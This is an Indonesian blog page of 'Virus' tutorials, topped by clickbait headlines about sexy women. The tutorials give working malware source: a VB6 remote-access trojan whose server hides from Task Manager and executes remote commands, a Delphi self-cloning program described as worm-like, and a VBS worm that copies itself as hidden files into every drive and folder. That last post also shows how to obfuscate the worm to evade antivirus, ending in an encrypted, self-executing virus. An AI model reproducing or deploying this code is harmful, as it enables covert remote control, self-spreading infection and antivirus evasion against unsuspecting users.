30 Cewek Seksi dan Bahenol Tombo Ngantuk Piala Dunia 2010

30 Cewek Seksi dan Bahenol Tombo Ngantuk Piala Dunia 2010

Figure pornographic products today

Gambar Porno yang sudah di edit menjadi gambar lucu

Kumpulan Cewek - Cewek Super Cantik Sejagat

Heboh ternyata cewek cantik itu harus cantik luar dan dalam berikut gambarnya

Cewek Bertato Makin Garang Dan Hot

Bukan Lelaki saja yang punya tato menarik ternyata cewek juga sangat sangar kalau punya tato

Perbedaan Cewek/Cowok Indonesia Dengan Malaysia

Setiap negara punya keunikan tersendiri. dan begitu juga isi penghuninya.. ada yang ganteng,ada juga yang jelek


Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

MEMBUAT PENGHANCUR DATA DENGAN VB6.0


--< Table Of Contents: -------------------------------------------------------------
  I. Preface
 II. Contents
     01. Konsep Dasar
     02. Let's do it!!
III. Penutup
-------------------------------------------------------------------------------------


I. Preface
-----------
 
File yang telah anda hapus ternyata belum sepenuhnya hilang dari harddisk anda sekalipun anda sudah memusnahkannya dari Recycle Bin. Di satu sisi hal ini menguntungkan karena kita bisa mengembalikan data-data penting kita yang tidak sengaja terhapus karena kelalaian kita. Namun di sisi lain bisa jadi berbahaya tatkala file tersebut berisi data rahasia yang ingin kita musnahkan karena orang lain bisa saja menemukan file rahasia itu dengan menggunakan software-software recovery data yang kini semakin banyak dan semakin luar biasa.
Untuk keperluan penghancuran data sensitif, kita mungkin sering bergantung pada tools yang telah banyak beredar. Kali ini, kita akan mencoba membuat tools penghancur data sendiri menggunakan VB6.0 dengan konsep sederhana.


II. Contents
------------

-----[01]. Konsep dasar
 
Konsep dasar dalam program penghancur data yang akan kita buat kali ini ialah sebagai berikut:
1. Buka file target kemudian hapus semua data yang tersimpan.
2. Ubah ekstensi File target.
3. Hapus File target.

-----[02]. Let's DO IT!
 
(1). Buka aplikasi VB6.0 anda. Pada jendela New Project, pilih Standard Exe lalu klik [OPEN].
(2). Tekan [CTRL]+[T] untuk memanggil jendela add component. Carilah component bernama Microsoft Common Dialog Control 6.0 (SP3). Beri centang lalu klik [OK].
(3). Sekarang, tambahkan komponen komponen berikut pada form anda:
     -> 1 buah TextBox
     -> 1 buah Label
     -> 2 buah Command Button
     -> 1 buah CommonDialog
     Atur tampilannya sesuai keinginan anda.
(4). Klik menu [View] lalu pilih [Code]. Salin code berikut pada area kerja anda.
(5). Compile hasil pekerjaan anda. Klik menu [File] [Make Project1.exe]. Beri nama data_destroyer.exe lalu klik [OK].
Cobalah untuk menghapus suatu file dengan aplikasi yang baru saja anda buat. Lalu cobalah recovery kembali data yang telah terhapus itu dengan software recovery data kesayangan anda. Lihat hasilnya.. ;)
III. PENUTUP
------------
Sekian, selamat mencoba.. ;)
.oO0:::::---- Greetz and Thanks: ----:::::0Oo.
~> Vindika Anastasya, the deepest love I'v ever had..
~> My daughter, Vermouth Anastasya
~> My young  sister, Rahma Octaviani
~> Cintya Flouren Salsabila. My best partner ;)
.oO0:::::---- A hearthy handshake to: ----:::::0Oo.
~> All Crack SKY Staff!
~> Mr.Rio Indralaksono (sleeping boy!!)
~> All Boikoterz in blablabla UNIVERSITY..
~> And also to all member of www.spyrozone.net
Share:

Membuat Trojan Horse Dengan Visual Basic 6.0

INTRO
      Ada yang udah tau mengenai Trojan Horse sebelumnya? Pasti udah tau donk!! Yang belum tau (Kasiaaaaan….dech…lo….) silahkan cari artikel mengenai Trojan Horse pada media-media lain (Koran, ilmukomputer.com, jasakom, dll). Soalnya untuk jelasin Trojan Horse Perlu satu halaman lebih…CUUUAAAAPPPEEEKKK….!!!
Ok dech langsung aza…!!!
      Pada pembuatan Trojan Horse ini (TH) ada beberapa step yang perlu kita perhatikan antara lain:
  1. Tahap Persiapan
  2. Tahap Pengerjaan
a). Client
      è Interface
      è Coding : Conection, Half-Execution, Error Handler, dll..+ debug
b). Server
      è Coding : Open Gate, Execution, Stealth, dll.
      3.  Tahap Akhir
      Sekarang marilah kita mulai untuk membuat proyek kita ini. Disarankan sebelum kita memulai untuk melaksanakan suatu pekerjaan ada baiknya kita berdoa terlebih dahulu agar apapun yang kita kerjakan mendapat berkah dari Tuhan YME. Amin…..!!!!!!
1. TAHAP PERSIAPAN
      Pada tahap ini yang pertama harus kita lakukan adalah membuka aplikasi Visual Basic. Setelah itu pada jendela New Project pilih Standard EXE seperti pada gambar.
Setelah itu akan tampil satu form kosong, dan tampilan default lainya.
      Untuk membuat proyek ini kita tidak bisa  menggunakan tools (control) sederhana yang ditampilkan pada Toolbox. Kita memerlukan satu control tambahan yang harus kita load ke dalam Toolbar/Toolbox. Control yang kita maksud disini adalah MS WINSOCK control.
      Untuk mengaktikan (memanggil) control ini kita pilih Project > Components pada Menubar. Maka akan tampil jendela component seperti pada gambar:
      Lalu kita pilih Microsoft Winsock Control 6.0 dengan memberi tanda centang pada checkbox disisi kirinya (spt pada gbr). Maka pada toolbar akan tampil satu control tambahan ber-icon dua computer yang terhubung oleh garis merah seperti pada gambar berikut.
         Gambar ini menandakan bahwa ms winsock control berhasil kita load ke dalam toolbar dan siap di gunakan.
         Dengan tampilnya icon contol tersebut berarti persiapan kita untuk membuat proyek ini telah selesai. Maka kita akan lanjutkan ketahap berikutnya. Yaitu tahap pengerjaan.
2. TAHAP PENGERJAAN
      Seperti yang sudah kita ketahui sebelumnya, umumnya program TH terdiri dari dua unit program yaitu : CLIENT dan SERVER. Saya akan coba jelaskan sedikit maksud dari kedua program ini.
      Program CLIENT ialah program yang akan kita gunakan sebagai sarana pengendali (remote) dari program SERVER. Dengan kata lain program ini lah yang akan kita gunakan untuk mengeksekusi computer korban (victim) dengan bantuan SERVER yang ditanamkan pada victim.
      Sedangkan program SERVER ialah program yang akan kita tanamkan pada victim dengan tujuan mengeksekusi victim itu sendiri berdasarkan instruksi yang dikirimkan oleh program CLIENT. Bingung??!!!...Sukuriiinnn…!!!!
      Okey..marilah kita mulai tahap ini dengan membuat program CLIENT terlebih dahulu. Kenapa?? Karena untuk membuat program ini tidaklah terlalu sulit. OK..marilah…ehm…
Program CLIENT
      Pada program ini kita akan membuat dua “Fun Menu” yaitu : Open/Close CD ROM dan Send Message.
Sekilas Info:
Sebenarnya masih banyak “Fun Menu” lain yang dapat kita tambahkan, tapi pada pembahasan kali ini  kita persingkat saja karena akan memakan banyak halaman untuk menjelaskannya. Oleh karena itu pembahasan “Fun Menu” lebih lanjut  akan saya buat pada artikel selanjutnya (“Membuat TH dengan VB6 seri 2). Untuk release artikel ke-2, tergantung dari banyaknya respon yang mendukung yang saya terima melalui e-mail di xpartacvs@gmail.com
Interface
      Dalam hal ini yang kita perlukan ialah 5 command button, 2 textbox, 1 label, dan 1 winsock control. Atur sedemikian rupa sesuai selera anda pada form.
rename tiap nama control menjadi seperti dibawah ini :
Command1     - cmdConnect                      Label1       - lblStatus
Command2     - cmdDisconnect                  Text1        - txtIP
Command3     - cmdOpen                           Text2        - txtMsg 
Command4     - cmdClose                           Winsock1 - tcpClient
Command5     - cmdMsg
Jangan lupa Caption dan Text pada control.
Coding
Ok saatnya coding…..
Klik ganda pada tombol Connect, lalu masukan code berikut pada jendela code:
Private Sub cmdConnect_Click()
On Error Resume Next
cmdConnect.Enabled = False
lblStatus.Caption = "Connecting..”
If txtIP.Text = "" or Then
  MsgBox "Please enter a valid IP adress", vbCritical
End If
    tcpClient.Connect txtIP.Text, 6666
End Sub
Maksud dari script diatas ialah:
computer akan mematikan tombol connect. Lalu computer akan memberikan keterangan “connecting….” pada label status untuk memberikan keterangan pada anda bahwa saat ini anda sedang berusaha untuk melakukan koneksi ke computer Korban. Setelah itu computer akan mengecek apakan anda sudah mengisi IP Address atau belum. Jika belum  maka akan tampil msgbox jika sudah maka computer akan mencoba koneksi ke nomor IP yang anda masukan pada txtIP dengan nomor port 6666 (nomor port bisa diisi berapa saja, umumnya terdiri dari empat digit).
Peringatan :
 Perhatikan dan ingat nomor port yang anda masukan, karena akan kita gunakan untuk program SERVER.
Klik ganda pada tombol disconnect dan masukan code berikut:
Private Sub cmdDisconnect_Click()
On Error Resume Next
LblStatus.Caption = “Not Connected”
cmdDisconnect.Enabled = False  
cmdConnect.Enabled = True   
tcpClient.Close  
End Sub
Maksud dari script diatas ialah:
Computer akan memberi keterangan “Not Connected” pada label status untuk menginformasikan bahwa tidak ada koneksi yang sedang berjalan saat ini. Lalu Komputer akan mematikan tombol Disconnect dan menghidupkan kembali tombol Connect. Lalu computer akan memutuskan hubungan dengan Server.
Klik ganda pada Winsock dan pilih pada menu event  “Connect”. (spt pada gbr):
Lalu tambahkan kode berikut:
Private Sub tcpClient_Connect()
lblStatus.Caption = "Connected" 
End Sub
Keterangan “Connected pada label status hanya akan tampil setelah SERVER merespon.
Half-Execution
      Mungkin anda bertanya kenapa saya menyebutnya Half-Execution. Alasanya ialah karena pada program CLIENT ini Eksekusi yang kita inginkan belumlah dapat di jalankan tanpa bantuan SERVER. Prinsip kerja program CLIENT dalam melaksanakan eksekusi ialah hanya sebagai “Commander” atau pemberi instruksi.
           Maksudnya disini  program CLIENT akan mengirimkan data berupa ‘string’ kepada program SERVER yang nantinya akan diolah (diterjemahakan) oleh program SERVER sebagai suatu perintah untuk melaksanakan eksekusi. Ok..mari kita mulai….
Klik ganda pada tombol Open cd-rom lalu tambahkan kode berikut:
Private Sub cmdOpen_Click()
tcpClient.SendData "opn”   'Mengirimkan string ke server
End Sub
Klik ganda pada tombol Close cd-rom lalu tamahkan kode berikut:
Private Sub cmdClose_Click()
tcpClient.SendData "cls”  'Mengirimkan string ke server
End Sub
Klik ganda pada tombol Send message dan tambahkan kode berikut:
Private Sub cmdMsg_Click()
tcpClient.SendData "msg" & txtMsg   'Mengirim string ke server beserta isi txtbox
End Sub
Selamat Program CLIENT sudah selesai…….!!!!
Debug Client
      Program CLIENT yang baru kita buat diatas belumlah sempurna. Saya yakin masih banyak terdapat bug pada program tersebut. Oleh karena itu marilah kita mencoba untuk menyempurnakanya.
  1. Tombol Disconnect
              Pada object ini yang pertama yang harus kita perhatikan ialah Property dari tombol ini. Saat Program dijalankan pertama kali sebaiknya tombol ini berada pada keadaan ‘disabled’ (mati). Karena seperti yang sudah kita ketahui sebelumnya fungsi dari tombol ini adalah memutuskan Koneksi ke Server.
           Pada saat kita menjalankan program ini tentu saja belum ada koneksi sama sekali terhadap SERVER, oleh karena itu ada baiknya kita mematikan tombol ini dengan merubah property cmdDisconnect.Enabled manjadi false pada jendela property.
  1. On Error Resume Next
             Ada baiknya sebelum mengetikan code pada badan sub, kita awali dengan mengetikan On Error Resume Next agar ketika terjadi kesalahan program kita tidak mengeluarkan pesan error dan tidak keluar dari program.
Program SERVER
      Setelah program CLIENT selesai kita buat sekarang saatnya kita membuat program Executor yang sebenarnya yaitu program SERVER. Apakah program CLIENT anda masih terbuka? Sebaiknya iya agar kita lebih mudah dalam mengerjakan pogram SERVER.
Pertama jalankan kembali aplikasi visual basic seperti biasa dan pilih Standard EXE maka akan tampil tampilan default beserta tetek bengeknya…. Pada program SERVER ini kita hanya membutuhkan satu control yaitu MS WINSOCK CONTROL. Letakan satu winsock kedalam form dan beri nama tcpServer Bila belum tersedia pada toolbar, load kembali seperti pada pembahasan sebelumnya.. Dan jangan lupa mengganti nama form menjadi frmServer, jangan lupa juga untuk menguah property Visible-nya menjadi false.
 
Open Gate
      Kita akan mulai dari terhnik termudah dulu yaitu Open Gate. Mari kita Mulai……
Klik ganda pada form lalu masukan kode berikut:
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666  
tcpServer.Listen  
End Sub
Maksud dari script diatas:
Pertama winsock (tcpServer) akan mengecek pada port yang kita masukan yaitu 6666 (nomor port yang sama dengan program CLIENT). Setelah itu winsock akan membuka port tersebut dengan perintah Listen. Tujuannya ialah : agar program CLIENT yang mencoba untuk Connect ke computer korban dapat masuk melaliu port yang telah kita buka yaitu port 6666.
Sekarang kita akan memberi kode pada winsock jadi Klikganda pada winsock control dan pilih “connection request” pada combobox  event  ( kalau kurang jelas lihat pembahasan pada program CLIENT
Tambahkan kode berikut:
Private Sub tcpServer_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
tcpServer.Close  
tcpServer.Accept requestID  
End Sub
Maksud dari script diatas:
Pertama winsock akan menutup koneksi untuk menghindari terjadinya error, lalu ia akan menerima semua request yang masuk ( request dari program CLIENT).
Masih pada winsock,     pilih “error” pada combobox event dan beri kode berikut:
Private Sub tcpServer_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
On Error Resume Next
Do While tcpServer.State <> sckClosed
tcpServer.Close
loop  
tcpServer.Listen  
End Sub
Maksud dari script diatas:
Saat terjadi error pada koneksi, winsock akan segera menutup koneksi setelah itu ia akan membuka kembali port agar bisa dihubungi kembali oleh server.
     
Waw…untuk membuka pertahanan victim cukup panjang bukan? Sekarang marilah kita melangkah ke tahap berikutnya yaitu melakukan infeksi kedalam computer korban.
     
Execution
      Sekarang saatnya kita buat program pengeksekusi yang sebenarnya. Sebelum kita masuk kebagian utama, pertama-tama tambahkan sebuah module kosong. Pilih Projectdiatas layar” dan pilih add module. Lalu buka modul kosong tsb.
Untuk membuka atau menutup CD-ROM kita perlu menggunakan fungsi API pada windows. Oleh karma itu kita perlu API viewer.
Klik pada add-ins lalu klik API Viewer. Jika anda tidak melihatnya pada daftar maka klik Add-In Manager lalu pilih kemudian tekan “OK”. Saat kamu membuka API Viewer, kamu akan melihat jendela baru. Klik File lalu pilih load textfile dan pilih WIN32API.txt truss buka dech.

 
Load WIN32API.txt file
Pada mciSendString seperti yang ditunjukan oleh gambar, set Declaration Scope menjadi Public lalu tambahkan pada module. Tekan Insert untuk menambahkanya secara otomatis
Sekarang kita siap untuk memberi kode pada Open / Close cd-rom. Kembali ke form dan Klik ganda pada winsock dan pilih “DataArrival” pada procedure window lalu tambahkan kode beriktu:
Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long)
Dim varData As String
Dim strData As String
tcpServer.GetData strData, vbString
  
varData = Right(strData, Len(strData) - 3)
Select Case Cstr(strdata)
Case "opn"  
mciSendString "Set CDAudio Door Open", vbNullString, 0, 0
Case "cls"  
mciSendString "Set CDAudio Door Closed", vbNullString, 0, 0
Case "msg"  
MsgBox varData, vbInformation, "Information"
End Select
End Sub
Maksud dari script diatas:
Saat data diterima, pertama program akan mendeklarasikan vardata dan strdata sebagai string dengan strdata sebagai penampung data yang masuk. Sedangkan vardata ialah data bawaan yang tidak diproses sebagai perintah ( pesan pada msgbox ). Setelah itu program akan mengambil data yang masuk dengan mengkonversinya terlebih dahulu menjadi string, jika tidak data yang masuk akan bertipe byte. Lalu program akan menyeleksi data yang masuk apakah data bernilai opn, cls, atau msg. jika data bernilai opn maka akan dilakukan perintah pembukaan CD-ROOM, jika data adalah cls maka akan dilakukan perintah penutupn CD-ROOM, dan jika data bernilai msg maka akan ditampilkan msgbox berisi pesan yang ditampung pada variael vardata.
Stealth
      Untuk lebih memperpanjang umur program Trojan kita, ada baiknya kita buat program kita seolah tidak terlihat. Caranya ialah menghilangkan program dari task manager. Untuk melakukanya : Tambahkan script berikut pada sub Form_Load sehingga menjadi :
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666  
tcpServer.Listen  
App.TaskVisible = False
End Sub
3. TAHAP AKHIR
      Pada tahap akhir ini saya tidak akan menjelaskan apa-apa, pada tahap ini anda tinggal mengkompile program2 yang telah dibuat tersebut dan mungkin mengadakan sedikit pengetesan dan debugging.
PENUTUP
      Sebelumnya saya ucapkan terimakasih pada semua yang telah mendukung dalam penyusunan artikel ini. Selain itu saya juga mohon maaf apa bila ada kekurangan dan ketidak sempurnaan pada bahasan ini. Karena sebagai manusia saya tidak akan luput dari kesalahan. Saya juga mohon maaf yang sebesar-besarnya apabila rekan-rekan sekalian ada yang tidak menyukai artikel yang saya tulis. Artikel ini semata-mata saya buat tidak lain ialah hanya untuk berbagi pengalaman. Karena saya sadar “Diatas langit masih ada langit” jadi saya sangat mengharapkan saran dan kritik dari rekan-rekan sekalian demi kemajuan ilmu pengetahuan. Wassalam…
TAMBAHAN :
      Trojan ini masih jinak.. artinya belum melakukan infeksi sehingga masih aman untuk tahap percobaan. Untuk pembahasan lengkap (pure Trojan) akan saya bahas pada artikel ke-2. Thanx..
Author  : xpartacvs
Contact : xpartacvs@gmail.com
CopyLEFT (c) 2006 www.spyrozone.net All Rights Reserved

Share:

MEMBUAT PROGRAM YANG DAPAT MENGCOPY DIRINYA OTOMATIS

 
Source code program dalam DELPHI. Program ini akan mengcopy dirinya otomatis ke tempat yang dinginkan.. yeah mirip-mirip worm gitu deech.. ;) Thanks to CodeMaker .. Great work man ;)

   
var
Form1: TForm1;
ExeString: String;

implementation

{$R *.DFM}
////////////////////////////////////////////////////////////////////////////////
procedure Extract(A,B: String;Var C,D: String);
Var
E,F: Integer;
begin
if Pos(uppercase(A),C) > 0 then
begin
E := Pos(uppercase(A),C)+length(A);
F := Pos(uppercase(B),C);
D := Copy(C,E,F-E);
end;
end;
////////////////////////////////////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////
procedure Exe2String(var A:String);
Var
ExeStream: TFileStream;
MyStream: TMemoryStream;
begin
ExeStream:=TFileStream.Create(Application.ExeName,fmOpenRead or
fmShareDenyNone);
Try
SetLength(A, ExeStream.Size);
ExeStream.ReadBuffer(Pointer(A)^, ExeStream.Size);
Finally
ExeStream.Free;
end;
end;
////////////////////////////////////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////
procedure Delay(ms : longint);
var
TheTime : LongInt;
begin
TheTime := GetTickCount + ms;
while GetTickCount < TheTime do
Application.ProcessMessages;
end;
////////////////////////////////////////////////////////////////////////////////


////////////////////////////////////////////////////////////////////////////////
procedure TForm1.FormCreate(Sender: TObject);
Var
MyStream: TMemoryStream;
name,C,Temp: String;
D,E: integer;
begin
exe2String(ExeString);////////////////////////////Get entire exe file from HD
//and store in global variable
//ExeString.


if pos(uppercase('soname'),exestring) > 0 then //Check if exe contains a
begin //users name already
and if
delay(500); //it does then see if
the
if pos('_clone',application.exename) = 0 then //running exe is a temporary
begin //clone program.. if
it is
not
name := application.exename; //a clone then attempt to delete
Insert('_clone',name,(length(name)-3)); //any clone that may be in the
deletefile(name); //applications directory. This
end; //ensures that no clone will
//ever remain after exe has
//been customized.....


////////////////////////////////////////////////////////////////////////////////
edit1.visible := false; ///////////////////////It has been determined that
form1.color := $00c6aa84; //the running exe has already been
form1.height := 300; //customized..so alter the exe's
//appearance to reflect that fact
//This is where you put any setup code you want
//to run when it has been determined that the exe
//has ALREADY been modified! Code to check for a
//valid usename+key,to alter the exe's appearance
//or whatever you want to do to change the way the
//now modified prog is to act should be done HERE!end;


////////////////////////////////////////////////////////////////////////////////
//The code below runs IF it is determined that the currently running exe is
//a temporary clone program..... this code will delete the original exe file
//from the HD and then save a new copy of itself to the HD with the original
//exe name...DO NOT REMOVE THE delay(500) line! The program will fail sometimes
//if you do! Since the currently running exe is a clone that means it already
//has been modified and in fact is identical to the final exe that it is saving
//to disk with the original name... as soon as the new exe is saved to disk
//this code runs it...then immediately terminates itself .. the clone commits
//hari kiri :-) and since every time a customized exe starts up it attempts
//to delete it's clone from the current directory this clones remaining life
//on disk is limited to 1/2 second......
if pos('_CLONE',uppercase(application.exename)) <> 0 then
begin
delay(500);
name := application.exename;
Delete(name,length(name)-9,6);
if deletefile(name) then
begin
MyStream := TMemoryStream.Create;
try
MyStream.WriteBuffer(Pointer(ExeString)^, Length(ExeString));
MyStream.savetofile(name);
finally
MyStream.Free;
ShellExecute(Handle, 'open',
pchar(name), nil, nil, SW_SHOWNORMAL);
application.terminate
end;
end
else showmessage(name+' not found');//this displays if it was determined that
//the running exe is a clone but for some
//crazy reason the original exe file is
//not found in the current directory :-(


end;

//The code below extracts the user name string from the exe file
//and displays it as a caption...but you could retrieve whatever
//data you had stored and do whatever you want with it :-)


if Pos(uppercase('soname'),exestring) > 0 then //Extract Name string
begin //from exe file and
Extract('soname','eoname',ExeString,Temp); //display as the button
SpeedButton1.Caption := 'Program is Registered to '+Temp;//caption :-)
end;
end;
////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////
//The code in the SpeedButton event handler below modifies the string held in
//the global variable ExeString...this string contains the entire exe file as
//string data...it modifies ExeString by adding data to it's end... the data is
//held between the demarcators 'SONAME' and 'EONAME' these mark off the data
//and make it possible to find it later and extract it from the running exe
//After ExeString is modified it is saved to a new file in the current directory
//with the exe's name plus '_clone' so if the exe name is myprog.exe the clone
//that is saved will be myprog_clone.exe... as soon as the clone exe is saved
//to disk the program runs it and then terminates itself :-)
//The reason uppercase('soname') is used is because the program would find the
//data 'SONAME' at the wrong point in the exe file if you did not do it this way
//ditto for uppercase('eoname') this is an IMPORTANT POINT!


procedure TForm1.SpeedButton1Click(Sender: TObject);
var
MyStream: TMemoryStream;
MyFile,newname: string;
A,B: Integer;
begin
If Speedbutton1.Caption <> 'Enter Your Name Below Then Click Here To
Customize Exe'then
begin
exit;
end;
begin
if edit1.text = '' then
begin
showmessage('Please enter a name in the Edit Box!');
exit;
end;
MyStream := TMemoryStream.Create;
try
//in line below you tack on the new data :-)
ExeString := ExeString + uppercase('soname') + Edit1.Text
+ uppercase('eoname');

MyStream.Clear;
MyStream.WriteBuffer(Pointer(ExeString)^,
Length(ExeString));//string
2 stream

newname := application.exename; //change name to make it a clone!
Insert('_clone',newname,length(application.exename)-3);

MyStream.savetofile(newname);//save stream to file as a temporary
clone!
finally
MyStream.Free;
end;

ShellExecute(Handle, 'open', //run the clone you just
saved!
pchar(newname), nil, nil, SW_SHOWNORMAL);

application.terminate; //die little proggie
die! :-)
end;
Author  : SPYRO KiD
Contact : admin[~@~]spyrozone.net || http://spyrozone.net
CopyLEFT (c) 2005 www.spyrozone.net All Rights Reserved

Share:

TEHNIK ENKRIPSI VIRUS VBS

 
Melihat banyaknya email dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan program atau script encrypter maka virus kamu akan didetect oleh antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri karakter ASCII nya.

Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe saya juga pusing ;-) untuk meng enkripsi kamu harus mengubah semua karakter " menjadi karakter ASCII lain, seperti ä,ö,æ,Æ,ô,ò dll. Tapi kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu
butuh table ASCII. ;Þ~

Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu bisa memilih karakter ASCII sesuai pilihanmu.

'<----------------- awal ASCII Tabel ---------------------->
for i=0 to 256
x=x+"angka "&i&" --> "&chr(i)&vbcrlf
next

Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("C:\ascii.txt")
hilman.write x
hilman.close
'<----------------- akhir ASCII Tabel --------------------->

lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari 0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan sekarang buka virusmu ketik Ctrl+H(Replace). Isikan " pada Find what dan ¤ pada Replace with. Klik Replace All dan Save.
Kamu harus tau berapa angka ASCII " dan ¤(caranya ya liat tabel tadi ;Þ)
...
angka 34 --> "
angka 164 --> ¤
...

catatan : "jangan memilih kode ASCII yang telah ada dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda kutip(").

Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor kamu dan ketik script berikut :

'<---------------- awal encryptor ---------------------->
Set Anton = CreateObject("Scripting.FileSystemObject")
Set maVero=Anton.OpenTextFile("C:\suriv.vbe")
virus=maVero.ReadAll
On Error Resume Next
VA3 = ""
For I = 1 To Len(virus)
Baca = Asc(Mid(virus, I, 1))
If Baca = 164 Then
'nah ini untuk karakter " yang kita tukar tadi..
'jadi, jika ditemukan karakter ASCII 164(¤) maka..

Tukar = Chr(215)
'ubah jadi karakter ASCII 215(×)
'nah selanjutnya terserah kamu, kalau kamu mau mengubah suatu huruf menjadi karakter ASCII yang
'spesial silahkan asal di catat dan di ingat.

ElseIf Baca = 10 Then
Tukar = Chr(28)
ElseIf Baca = 13 Then
Tukar = Chr(29)
Else
Tukar = Chr(Baca - 1)
End If
hasil=hasil & Tukar
Next
Set hilman=anton.createtextfile("C:\hasil.txt")
hilman.write hasil
hilman.close
'<----------------- akhir encryptor --------------------->


'ini contoh file C:\suriv.vbe yang dipakai pada encryptor di atas.
'<---------[ awal contoh kode yang akan di encrypt ]------------>
On Error Resume Next
Set ElkaUNP = CreateObject(¤Scripting.FileSystemObject¤)
Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1)
Kode = Padang.ReadAll
Set Drives = ElkaUNP.Drives
For each Drive in Drives
if Drive.isReady then
Periksa(Drive & ¤\¤)
End if
Next
Sub Periksa(Target)
On Error Resume Next
Set Elektronika = ElkaUNP.GetFolder(Target)
SumBar = Target & ¤\ElkaUNP.vbs¤
if (SumBar <> ¤ElkaUNP.vbs¤) then
Set FT_UNP = ElkaUNP.CreateTextFile(SumBar)
FT_UNP.Write Kode
FT_UNP.Close
FT_UNP = ¤¤
Set Atribut = ElkaUNP.GetFile(SumBar)
Atribut.Attributes = 35
SumBar = ¤ElkaUNP.vbs¤
End if
For Each SubFolder in Elektronika.SubFolders
Periksa(SubFolder.Path)
Next
End Sub
'<---------[ akhir contoh kode yang akan di encrypt ]------------>


pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu karakter :
164 jadi 215
10 jadi 28
13 jadi 29 (liat aja di tabel..;Þ~ huruf apa itu)
dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca 40 maka diubah jadi
chr(39) --> 40-1=39)

hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt

Ketiga, copy isi file 'C:\Hasil.txt' dan buat script encrypter berikut ini :
'<------------------- awal unencryptor --------------------->
Explorer="
pastekan isi file C:\Hasil.txt diantara tanda kutip ini. Nah karena tanda kutip ini lah
saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak akan jalan kalau ada
3 atau 4 tanda kutip ;-)
"
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
'jika menemukan karakter ASCII 215 maka
Windows = Chr(34)
'akan diubah menjadi tanda " kembali. sederhana kan..
'selanjutnya hanya kebalikan dari encryptor diatas(jika 10 diubah jadi 28 maka sekarang di
'kembalikan 28 jadi 10 ;-) dst

ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next

Set Anton = CreateObject("Scripting.FileSystemObject")
Set hilman=anton.createtextfile("c:\hasilx.txt")
hilman.write Microsoft
hilman.close
'<------------------ akhir unencryptor --------------------->


sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.

Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti dibawah ini:
'<------------------ awal virus jadi --------------------->
'badan virus
Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm Dqqnq Qdrtld Mdws
Rds Dkj`TMO < Bqd`sdNaidbs'×Rbqhoshmf-EhkdRxrsdlNaidbs×( Rds O`c`mf < Dkj`TMO-NodmSdwsEhkd'Vrb
qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq d`bg Cqhud hm Cq
hudr he Cqhud-hrQd`cx sgdm Odqhjr`'Cqhud % ×[×( Dmc he Mdws Rta Odqhjr`'S`qfds(
Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq'S`qfds( RtlA`q < S`qfds % ×[Dkj`TMO-
uar× he 'RtlA`q ;= ×Dkj`TMO-uar×( sgdm Rds ES^TMO < Dkj`TMO-Bqd`sdSdwsEhkd'RtlA`q( ES^
TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < ×× Rds @sqhats < Dkj`TMO-FdsEhkd'RtlA`q( @sq
hats-@ssqhatsdr < 24 RtlA`q < ×Dkj`TMO-uar× Dmc he Enq D`bg RtaEnkcdq hm Dkdjsqnmhj`-RtaE
nkcdqr Odqhjr`'RtaEnkcdq-O`sg( Mdws Dmc Rta &;,,,,,,,,,Z `jghq bnmsng jncd x`mf `j`m ch d
mbqxos \,,,,,,,,,,,,= "
'untuk unenkripsinya
Dim Microsoft
For I = 1 To Len(Explorer)
Internet = Asc(Mid(Explorer, I, 1))
If Internet = 215 Then
Windows = Chr(34)
ElseIf Internet = 28 Then
Windows = Chr(10)
ElseIf Internet = 29 Then
Windows = Chr(13)
Else
Windows = Chr(Internet + 1)
End If
Microsoft = Microsoft & Windows
Next
'untuk mengeksekusi hasil unenkripsi
Execute Microsoft
'<------------------ akhir virus jadi --------------------->


